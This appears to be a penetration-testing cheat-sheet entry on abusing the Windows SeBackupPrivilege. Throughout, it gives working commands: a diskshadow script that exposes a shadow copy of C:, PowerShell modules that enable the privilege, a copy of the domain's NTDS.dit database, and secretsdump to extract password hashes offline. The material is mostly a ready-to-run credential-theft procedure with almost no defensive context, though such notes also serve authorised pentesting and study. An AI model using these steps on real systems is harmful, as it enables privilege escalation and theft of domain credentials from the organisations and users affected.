SeBackupPrivilege
This privilege is a win. We can create a shadow copy of the OS and read secret files such as SYSTEM, SECURITY, NTDS.dit etc
Create a shadow copy and expose it as a network share.
diskshadow.exe
set context persistent nowriters
add volume C: alias morph3
create
expose %morph3% G:
Diskshadow.exe puts you into an interactive session so If the commands above doesn't work, don't forget to add ; after the commands.
To abuse my SeBackupPrivilege privilege, use the dll below and enable your privilege.
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
After that you can copy the secret files,
Copy-FileSeBackupPrivilege <source> <target>
Copy-FileSeBackupPrivilege G:\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
And you can dump the hashes locally
python secretsdump.py -system ./SYSTEM -ntds ./ntds.dit LOCAL
Last updated